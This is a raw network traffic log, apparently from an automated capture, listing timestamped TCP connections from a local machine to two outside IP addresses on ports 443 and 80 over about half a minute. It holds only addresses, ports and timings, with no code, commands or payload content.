                                                                                                          Jan 11, 2025 03:06:36.702960968 CET49754443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:36.702967882 CET44349754149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:36.876534939 CET44349754149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:36.876611948 CET44349754149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:36.876729012 CET49754443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:36.877341986 CET49754443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:36.881035089 CET4975380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:36.886425018 CET8049753132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:36.886539936 CET4975380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:36.887881994 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:36.892733097 CET8049755132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:36.892935038 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:36.893040895 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:36.897811890 CET8049755132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.221594095 CET8049755132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.235255003 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:38.235323906 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.235410929 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:38.235807896 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:38.235821962 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.282565117 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:38.856278896 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.859540939 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:38.859570026 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:38.859626055 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:38.859637022 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.032404900 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.032480955 CET44349756149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.032535076 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:39.033122063 CET49756443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:39.037395954 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:39.038582087 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:39.042437077 CET8049755132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.042491913 CET4975580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:39.043471098 CET8049757132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.043533087 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:39.043637991 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:39.048419952 CET8049757132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.882061958 CET8049757132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.883789062 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:39.883838892 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.883913040 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:39.884222031 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:39.884241104 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:39.923259974 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.490006924 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.493100882 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:40.493123055 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.493192911 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:40.493202925 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.757575035 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.757679939 CET44349758149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.757900000 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:40.758404016 CET49758443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:40.761779070 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.762761116 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.766812086 CET8049757132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.767072916 CET4975780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.767581940 CET8049759132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:40.771358013 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.771517038 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:40.776334047 CET8049759132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:41.594609976 CET8049759132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:41.626024961 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:41.626079082 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:41.626173973 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:41.626686096 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:41.626698017 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:41.641782999 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.234013081 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.236330032 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:42.236358881 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.236422062 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:42.236428022 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.413688898 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.413774967 CET44349760149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.413826942 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:42.419596910 CET49760443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:42.424115896 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.424750090 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.433779001 CET8049759132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.433831930 CET4975980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.434163094 CET8049761132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:42.434223890 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.434350014 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:42.440171957 CET8049761132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.279299021 CET8049761132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.280735016 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.280785084 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.280996084 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.281339884 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.281358957 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.329308033 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:43.904056072 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.905780077 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.905813932 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:43.905873060 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:43.905895948 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177551031 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177645922 CET44349762149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.177707911 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:44.199424028 CET49762443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:44.520904064 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.521575928 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526139021 CET8049761132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.526237011 CET4976180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526477098 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:44.526546955 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.526838064 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:44.531626940 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.796715021 CET8049713132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.798158884 CET4971380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:45.845668077 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.846973896 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847012997 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.847075939 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847382069 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:45.847393990 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:45.891799927 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.669894934 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.671683073 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.671696901 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.671751976 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.671758890 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849107027 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849194050 CET44349764149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.849271059 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.849790096 CET49764443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:46.856251001 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.857055902 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.861269951 CET8049763132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.861341953 CET4976380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.861845970 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:46.861910105 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.862025976 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:46.866744995 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.889677048 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.890942097 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.890976906 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.891208887 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.891514063 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:47.891525984 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:47.938683033 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.608517885 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.612454891 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.612484932 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.612555027 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.612566948 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866168976 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866250038 CET44349766149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.866617918 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.866942883 CET49766443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:48.870392084 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.871546030 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876193047 CET8049765132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.876250982 CET4976580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876351118 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:48.876408100 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.876497984 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:48.881208897 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.825568914 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.828707933 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.828751087 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.828851938 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.829143047 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:49.829154015 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:49.876211882 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.434844971 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.437148094 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.437175035 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.439366102 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.439385891 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701338053 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701406002 CET44349768149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.701551914 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.702119112 CET49768443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:50.706160069 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.707484961 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.711170912 CET8049767132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.711297989 CET4976780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.712297916 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:50.712393999 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.712588072 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:50.717365980 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.544471025 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.546312094 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546365976 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.546444893 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546823978 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:51.546834946 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:51.594932079 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.154125929 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.155997038 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.156017065 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.156086922 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.156095982 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402120113 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402192116 CET44349770149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.402504921 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.402822971 CET49770443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:52.405715942 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.406831980 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.413146019 CET8049769132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.413958073 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:52.414024115 CET4976980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.414062977 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.414118052 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:52.419513941 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.242187977 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.247042894 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247092009 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.247344971 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247724056 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.247740984 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.298109055 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:53.869505882 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.871368885 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.871388912 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:53.871592045 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:53.871597052 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:54.047749043 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:54.047827005 CET44349772149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:54.047894001 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:54.157478094 CET49772443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:54.169150114 CET4971380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.367850065 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.368998051 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.373718023 CET8049771132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:54.373760939 CET4977180192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.373785019 CET8049773132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:54.373835087 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.373991966 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:54.378750086 CET8049773132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.204922915 CET8049773132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.206379890 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.206428051 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.206506014 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.206788063 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.206800938 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.251223087 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:55.810712099 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.817109108 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.817131996 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.817435026 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.817441940 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.991808891 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.991894007 CET44349774149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:55.992105007 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.992496014 CET49774443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:55.995874882 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:55.997162104 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:56.000894070 CET8049773132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.002480984 CET4977380192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:56.002903938 CET8049775132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.002989054 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:56.003343105 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:56.008112907 CET8049775132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.822174072 CET8049775132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.853013039 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:56.853065014 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.853164911 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:56.853475094 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:56.853487015 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:56.876249075 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.455017090 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.461680889 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:57.461704969 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.463378906 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:57.463383913 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.713885069 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.713965893 CET44349776149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.715384007 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:57.715701103 CET49776443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:57.719216108 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.720515966 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.725790977 CET8049775132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.726780891 CET8049777132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:57.726880074 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.726906061 CET4977580192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.727060080 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:57.734066963 CET8049777132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:58.555742025 CET8049777132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:58.558331013 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:58.558382034 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:58.558433056 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:58.559058905 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:58.559078932 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:58.610596895 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.266021967 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.268043041 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:59.268078089 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.268141031 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:59.268150091 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.524807930 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.525217056 CET44349778149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.527481079 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:59.528059006 CET49778443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:06:59.531565905 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.532356024 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.538640022 CET8049777132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.538983107 CET8049779132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:06:59.539397001 CET4977780192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.539432049 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.554446936 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:06:59.563211918 CET8049779132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:00.358151913 CET8049779132.226.8.169192.168.2.10
                                                                                                          Jan 11, 2025 03:07:00.407509089 CET4977980192.168.2.10132.226.8.169
                                                                                                          Jan 11, 2025 03:07:00.563529015 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:00.563610077 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:00.563690901 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:00.564527988 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:00.564539909 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.197789907 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.199637890 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:01.199666023 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.199836016 CET49780443192.168.2.10149.154.167.220
                                                                                                          Jan 11, 2025 03:07:01.199842930 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.457820892 CET44349780149.154.167.220192.168.2.10
                                                                                                          Jan 11, 2025 03:07:01.457914114 CET44349780149.154.167.220192.168.2.10
